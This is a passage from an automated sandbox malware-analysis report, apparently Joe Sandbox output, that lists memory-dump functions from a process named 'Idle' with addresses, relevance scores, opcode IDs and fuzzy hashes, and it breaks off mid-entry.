                  Function 00007FFD9BA26121 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 43ee3eb24574cea94007aa064fa004e1e637351b57b60dd887901ca2e5c3990f
                  • Instruction ID: c1c1ec1e6eaad7a5ca28d75e9469b4b2661f4e4cb05e4ec1ce0119dbd31e8d80
                  • Opcode Fuzzy Hash: 43ee3eb24574cea94007aa064fa004e1e637351b57b60dd887901ca2e5c3990f
                  • Instruction Fuzzy Hash: B5118630A4B64E4FEB59EB6884792B97BA0EF15300F4504BFD45EC71E3DE6575448701
                  Function 00007FFD9BA27C74 Relevance: .1, Instructions: 57COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7e5789195ff7635424ebae14f292c29b86d534f1f063021ff6a854ee85573ff0
                  • Instruction ID: 506c8c66dc1dc5fb7520fca27e2b274d52cf65f2a541f60d7a504d8e75e85dbf
                  • Opcode Fuzzy Hash: 7e5789195ff7635424ebae14f292c29b86d534f1f063021ff6a854ee85573ff0
                  • Instruction Fuzzy Hash: 8B11AD71E1590D9FDF50EF98D885AEEBBB5FF94314F00013AE418D3291CB746A468B80
                  Function 00007FFD9BA3136E Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1b05ffe01efc6fa945aadad3ad0e08c55b70b3f5caa60b6d3a733ab1f67f415f
                  • Instruction ID: d0c9dd8ad4131788f87546f58ef80a32cf90b039a9330bb91a10c15667451868
                  • Opcode Fuzzy Hash: 1b05ffe01efc6fa945aadad3ad0e08c55b70b3f5caa60b6d3a733ab1f67f415f
                  • Instruction Fuzzy Hash: B001493274650B8FEB649F48D4202F673D5EF70325F11423BD81EC36E1DE69A9508780
                  Function 00007FFD9BA270ED Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 160a018f0464b96046f1e58813079a7ad773036dd41d8a69df88e46cdef71efd
                  • Instruction ID: 92fa121af10dd44be1ff72b134c3596302c6d31e828233b7708f358e944ad949
                  • Opcode Fuzzy Hash: 160a018f0464b96046f1e58813079a7ad773036dd41d8a69df88e46cdef71efd
                  • Instruction Fuzzy Hash: 0F11C430A4A64E4FEBA8EF54C4656B97BA0EF55300F0501BFD41DC61A2DE756A448741
                  Function 00007FFD9BA2F555 Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f490efba7b9c24941dbf280965abaf54efd4a7c9f502c2b37be83574409470dc
                  • Instruction ID: 8434a7193b712b7b1057bcb2e3efdaeb8657e76f8d26240cd1276fefcab9ab3a
                  • Opcode Fuzzy Hash: f490efba7b9c24941dbf280965abaf54efd4a7c9f502c2b37be83574409470dc
                  • Instruction Fuzzy Hash: BB01C421F8F1DF8BF7395FA814710BC5A506F41710F1A02B7D84E461E6DC8E2A416382
                  Function 00007FFD9BA1BD95 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4fca272fcde7b85ff45333a3a301e58e45faf81c7819cd74085843799c2cf116
                  • Instruction ID: cd43966199f82df35fd66a024310f3d31c92e78603f8543243ea96defff6af99
                  • Opcode Fuzzy Hash: 4fca272fcde7b85ff45333a3a301e58e45faf81c7819cd74085843799c2cf116
                  • Instruction Fuzzy Hash: A4115E30A0A64E8FEB99EF68C4696BD7BE1FF18300F4514BED41AC71A1DA75A650C740
                  Function 00007FFD9BA262D9 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2730ce2849a45c24eb95f2b4bdcc62a5b2192f0a62a7ffe66db39099581da803
                  • Instruction ID: bba471792dafce117cb8fcc0d871bab42b80b7f8627c5f4d4791d408d829b3f0
                  • Opcode Fuzzy Hash: 2730ce2849a45c24eb95f2b4bdcc62a5b2192f0a62a7ffe66db39099581da803
                  • Instruction Fuzzy Hash: CB117330E4E68E8FE751EB6888695A97FF0FF15300F4605B6D85CC70A2DE74A544C701
                  Function 00007FFD9BA35939 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c0583e2af7e204b3c1adbaf180122c99565b7236aa8836c8051f41ebfd85a80c
                  • Instruction ID: dd92f502cd137de02af730f43d48a16b5ad056e5f612df3c32691e3d77acbd3b
                  • Opcode Fuzzy Hash: c0583e2af7e204b3c1adbaf180122c99565b7236aa8836c8051f41ebfd85a80c
                  • Instruction Fuzzy Hash: D5119130A0E68E4FEB61EB6888696BD7BF0EF19310F0605F6D458C70A2DA74A544C741
                  Function 00007FFD9BA2CE00 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 898c19a24951adc106af2b85386944e35d9d584652595d90a0a7893b3863a359
                  • Instruction ID: d8f9e1da75a354f1b4f963e159d62f625ec8084b2ccdfc2da0f3076f78304cd9
                  • Opcode Fuzzy Hash: 898c19a24951adc106af2b85386944e35d9d584652595d90a0a7893b3863a359
                  • Instruction Fuzzy Hash: EE012D21F8F49F86F6381FD824711BD55416F84710F57067AE80F961E6DCCE6B812282
                  Function 00007FFD9BA2E1A6 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d28dcf9704f4deef06c808ac5bb388cbb8b76f5b92f07849b0f821b0c5a85ed0
                  • Instruction ID: 30032b15cea1a7ce5820d614c522f70d1f6ffe6eaeadf0e86b9d66fd4bd55c9d
                  • Opcode Fuzzy Hash: d28dcf9704f4deef06c808ac5bb388cbb8b76f5b92f07849b0f821b0c5a85ed0
                  • Instruction Fuzzy Hash: 9211FB71A48A5D8FDB98DB9884A5AAD77B1FB68300F0500BED40ED76E6DE656980CB00
                  Function 00007FFD9BA309C9 Relevance: .1, Instructions: 52COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3e8c08fa520251c7c59313ce936d2dc1c43b9a9d2007e2b26ba09a9d6f66c07e
                  • Instruction ID: 037875a415ad158541e7eed60d4a0f9951e3b307908c8153f57d8a1efa8601b4
                  • Opcode Fuzzy Hash: 3e8c08fa520251c7c59313ce936d2dc1c43b9a9d2007e2b26ba09a9d6f66c07e
                  • Instruction Fuzzy Hash: 31019231F49A4D4FEB64EBE8A8712ECB7A1EF59310F15017AD04DD22A3CD2959018740
                  Function 00007FFD9BA34576 Relevance: .1, Instructions: 51COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 79b19deda92370603fceeeb6fe0369ed76b05bba5f11ae05767b753f12640f8e
                  • Instruction ID: 11dfe65e446cb08f103ccad9a9a84b65a99fb43f2b525508f50b438bdd5d3708
                  • Opcode Fuzzy Hash: 79b19deda92370603fceeeb6fe0369ed76b05bba5f11ae05767b753f12640f8e
                  • Instruction Fuzzy Hash: C0018431E1DA4E8FEF648B9888211FD77B1FF48310F41057AD00AD21F1DE692A158750
                  Function 00007FFD9BA105D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d5133a0b76ba50774e5dc40c1d901ae5fb9507c3a88a77ee66dccf06830b8048
                  • Instruction ID: 4588de15962fac694d9c8a642ba451b5c42dc360a66e8d98329e7dbb4402609b
                  • Opcode Fuzzy Hash: d5133a0b76ba50774e5dc40c1d901ae5fb9507c3a88a77ee66dccf06830b8048
                  • Instruction Fuzzy Hash: 7B019A30A0990E8FDB98EF68C4656BA77A1FF68304F21547EE41EC35A4CEB5A650CB40
                  Function 00007FFD9BA1D79D Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 75e240de4448a4a9dd96036b1bef53db443391011154198ac47d202c31024074
                  • Instruction ID: bff7c74e2e1efa7e81f115253ce5f2947e8e78e50df93f0431b2936a419c86b3
                  • Opcode Fuzzy Hash: 75e240de4448a4a9dd96036b1bef53db443391011154198ac47d202c31024074
                  • Instruction Fuzzy Hash: A3116D30A0964E8FDBA8EF68C4696FD7BE0FF18304F5105BED42AC65A1DB75A650C740
                  Function 00007FFD9BA1E460 Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eece6ea17dd697a67d2f200747b701d3d9b0cc08c89ef260b3532890f978c643
                  • Instruction ID: 607c08bcc94d071d320ad64720f11e8e2748b210a229c7f37c7a1efd55b7589d
                  • Opcode Fuzzy Hash: eece6ea17dd697a67d2f200747b701d3d9b0cc08c89ef260b3532890f978c643
                  • Instruction Fuzzy Hash: 49016130D0450E8FDB94EF68C4545BA77B1FF98315F14497AE419D3199DB70A1908780
                  Function 00007FFD9BA11CE1 Relevance: .0, Instructions: 48COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 01628e558beea813d3cd37e3322444ca552cf9d22c9b1801613e6a455931a3cf
                  • Instruction ID: 0d9abea8f041a9ad3d1a04c50e44427b11126fe4b715ec2588037baa18ec8855
                  • Opcode Fuzzy Hash: 01628e558beea813d3cd37e3322444ca552cf9d22c9b1801613e6a455931a3cf
                  • Instruction Fuzzy Hash: 4801D630A0A68E8FDBD8DF64C4655B93BA1FF25304F4110BAD808C71A2DA799550CB80
                  Function 00007FFD9BA1E441 Relevance: .0, Instructions: 48COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8be56923b1b63a7a1ec23659b6872e07dd5fc3b761befc4eae52a928c69b59a9
                  • Instruction ID: 83b5d89346417a1ab353cceee0f57a2180d143f9629aa9ccedd4c718fe7efd55
                  • Opcode Fuzzy Hash: 8be56923b1b63a7a1ec23659b6872e07dd5fc3b761befc4eae52a928c69b59a9
                  • Instruction Fuzzy Hash: 6801F230D0A64E8FEB94DF6488542FA3BB0FF94304F05457AE818C31A6DB7491948781
                  Function 00007FFD9BA12F1D Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ccf7ceabecf39ef4e3d8053aa3e0176bdf11263e507b3c0fd13c0eb0b3cf22e5
                  • Instruction ID: dda8ce46e190816e5ebc5f5bbf14645127bb5504ddbcf576dc65b4bc88226100
                  • Opcode Fuzzy Hash: ccf7ceabecf39ef4e3d8053aa3e0176bdf11263e507b3c0fd13c0eb0b3cf22e5
                  • Instruction Fuzzy Hash: 5901D870E0A60E4FE791ABB4C4595A977E0FF15304F0656B6D418C20B5DE74E2548700
                  Function 00007FFD9BA1287D Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a2738f0f9aebc46161afa3f9fa955773190e3bc0b91841633c8a814087ec8ca9
                  • Instruction ID: 4396d82e00cf40b4f2571c8f74c8ebb430c06f98b49a28c70db0c4fba5693c71
                  • Opcode Fuzzy Hash: a2738f0f9aebc46161afa3f9fa955773190e3bc0b91841633c8a814087ec8ca9
                  • Instruction Fuzzy Hash: D401A230A0A64E8FE7A1EBA8C4595F97BE0FF59304F4655B6D408C60A6EF78E2848700
                  Function 00007FFD9BA1B038 Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e7d72c999ed550d91f315b9c51206d1724f0fa280ebeb3c814c3871af50c04f0
                  • Instruction ID: dd15530ff3519a9a5c73027a0b885689555def32eed18c574725a31e3d54cb5e
                  • Opcode Fuzzy Hash: e7d72c999ed550d91f315b9c51206d1724f0fa280ebeb3c814c3871af50c04f0
                  • Instruction Fuzzy Hash: 61015E70A1550E8FEB94FBA8C4A86BE76E0FF29304F11147ED41ED61A1EE79A250C740
                  Function 00007FFD9BA1AFF8 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0cedadba09a8570f17715cc96b5a07c1685d3e0f90d926964fb0139b0fd2a0c6
                  • Instruction ID: 5fd3a968b30c324caedf753882ae7d255def6223e4e29e8b6ed242cc16dab20c
                  • Opcode Fuzzy Hash: 0cedadba09a8570f17715cc96b5a07c1685d3e0f90d926964fb0139b0fd2a0c6
                  • Instruction Fuzzy Hash: 50018430A0550E8FEB98EF64C4A56BE7BA1FF58304F51247EE42EC61A4DE75A650CB40
                  Function 00007FFD9BA1AC59 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 80b39a9b513355268ec501a89ec724e4b850344201c24bcdd180946e0b4c72e1
                  • Instruction ID: bfc96a1c1f2e7df9a69ba3c802b1d99b51cc9d72f768cd8172e755a2b600cd2e
                  • Opcode Fuzzy Hash: 80b39a9b513355268ec501a89ec724e4b850344201c24bcdd180946e0b4c72e1
                  • Instruction Fuzzy Hash: 24018830A4F64D4FD7A2EBB4C4695A97BE0FF15300F4654F6D458C70B6DA74A5448701
                  Function 00007FFD9BA1C5A0 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f8e2b2cd3a34b364458ff16d82c33c06d2813570988b5bbabe2ca5bed2941a40
                  • Instruction ID: 565b892a95bee6bb0974df7b22a871d21e0084eb73a13f9128dd0dcd9c5b2ab3
                  • Opcode Fuzzy Hash: f8e2b2cd3a34b364458ff16d82c33c06d2813570988b5bbabe2ca5bed2941a40
                  • Instruction Fuzzy Hash: AE017C30A5590E8FEB94EF68C8696BEB7E0FF18304F10087AE41EC61A4EF74A250C700
                  Function 00007FFD9BA1A8B9 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 923253a5caeb583a3de99c45d47ad8aab99b32df013b253abafca6a77987e0cc
                  • Instruction ID: 88454ced1e897cf69b14fab82c30f960a2bcda02049f152f33d3f66f92063af7
                  • Opcode Fuzzy Hash: 923253a5caeb583a3de99c45d47ad8aab99b32df013b253abafca6a77987e0cc
                  • Instruction Fuzzy Hash: 26017131A4E78E5FE7A2EBB8C8695A97BE0EF09300F0655F7D058C70B6DE64A5848701
                  Function 00007FFD9BA277F9 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5f693ab73e86a498cc49959907833b847be99b609309ee75a50142afa80ceb40
                  • Instruction ID: e7fe61ebef11fc789e318169d4065a8cb187d89a17b3dd2b8c87b2d75a1b1e04
                  • Opcode Fuzzy Hash: 5f693ab73e86a498cc49959907833b847be99b609309ee75a50142afa80ceb40
                  • Instruction Fuzzy Hash: 16018430A4F68E8FE752AB7888695A97FE0EF16300F0645F7D449C70A6DA64AA84C701
                  Function 00007FFD9BA2E8D5 Relevance: .0, Instructions: 44COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aced70ddebdbbff52de3c85896dd5daf8aefd13efacb396d1ee732e7c214065b
                  • Instruction ID: 2afe73ab24494b422366fa20bd6db8003cfe1c1f02cef50649126bdea2424c25
                  • Opcode Fuzzy Hash: aced70ddebdbbff52de3c85896dd5daf8aefd13efacb396d1ee732e7c214065b
                  • Instruction Fuzzy Hash: DE01F571E0950E8BEB68DF94C4714BDB7B2EF54300F11047EC00A972E2DE786A41CB40
                  Function 00007FFD9BA12F89 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 29d6e8ede2ccc5d7dbfcd618e0ae09fb49fef072aae41fcb46448cba1b0f1fb6
                  • Instruction ID: 2356f89edffee1e6043533cac36947534cb0c120cd9526de6b4e41458959b33f
                  • Opcode Fuzzy Hash: 29d6e8ede2ccc5d7dbfcd618e0ae09fb49fef072aae41fcb46448cba1b0f1fb6
                  • Instruction Fuzzy Hash: 1401D870A0E74D4FE791ABB888695A97FE0EF05304F0615F6D448CB0B6DA78E5648301
                  Function 00007FFD9BA10610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a2de74193ca145f24f4c19c312c77d175e672f99d1d1a8611e1d59457e7fb69c
                  • Instruction ID: 9dcf486af85c0582b79da968e7b94681cea3dc7cbc248e46a29cb141faf8226c
                  • Opcode Fuzzy Hash: a2de74193ca145f24f4c19c312c77d175e672f99d1d1a8611e1d59457e7fb69c
                  • Instruction Fuzzy Hash: 2D016230A1960E8EEB98EFA4C4685B976A0FF18308F11187EE41EC21E5DF75A550C600
                  Function 00007FFD9BA10608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0bfcf1dba51e30b9f66d90e2eea3f53f500f84007d846622803d6671b29e577b
                  • Instruction ID: 86d2f720ce8802973218eb826a5b267d76927daa8107ee14fb2c9720d7f9ba6d
                  • Opcode Fuzzy Hash: 0bfcf1dba51e30b9f66d90e2eea3f53f500f84007d846622803d6671b29e577b
                  • Instruction Fuzzy Hash: 68016230A1560E8BEB99EFA4C4696BD73A1FF18309F11187ED41EC21E5DE75E250C600
                  Function 00007FFD9BA1ACC5 Relevance: .0, Instructions: 41COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 93858b17e0ffc8de97578b9f9be1bf9710828a98e99cd9e3fc3dc6228a1a01e9
                  • Instruction ID: 9d527030f865cdfab479f402c6cd20a6af76f32894cb096a744488af9fd0e010
                  • Opcode Fuzzy Hash: 93858b17e0ffc8de97578b9f9be1bf9710828a98e99cd9e3fc3dc6228a1a01e9
                  • Instruction Fuzzy Hash: 7D018121A0F38E4FD3A2ABA498A51E93BB0AF42214F4A14B7D099C60B3D96995488351
                  Function 00007FFD9BA11230 Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4057d4bfa69509398b07521715e65aac04e95c7952b28dd9734f20e194682c45
                  • Instruction ID: be54adab6be0e23f6cbe876260055e8abb36a3e4984db189f5c99e759e13ef12
                  • Opcode Fuzzy Hash: 4057d4bfa69509398b07521715e65aac04e95c7952b28dd9734f20e194682c45
                  • Instruction Fuzzy Hash: D8F0A470B1E55F4AEFE49BA888682FA77E4EF65314F05103AE46DC60E1EE7456448240
                  Function 00007FFD9BA12EA1 Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5faef0d5329ba3fd9dd0ad975e95943e9294d701481ab903c69b9a74fbfce90f
                  • Instruction ID: 2d78d2ea1d6218833053894d9c7f6965780c95cefbf641a9f40661149d1166ed
                  • Opcode Fuzzy Hash: 5faef0d5329ba3fd9dd0ad975e95943e9294d701481ab903c69b9a74fbfce90f
                  • Instruction Fuzzy Hash: F0F0963090F38D4FEBA9DFA488655E93FA0FF05204F4515BAE459C60E6DB78D554C700
                  Function 00007FFD9BA1C609 Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d0807ba500f141244450ad29341129d5fd2ee8ed234862f65c21a13c19873d01
                  • Instruction ID: d10eb9ebcbfba0cb56082bab7c348dfd149b4dd8febd0c9d5b899ec5ad560480
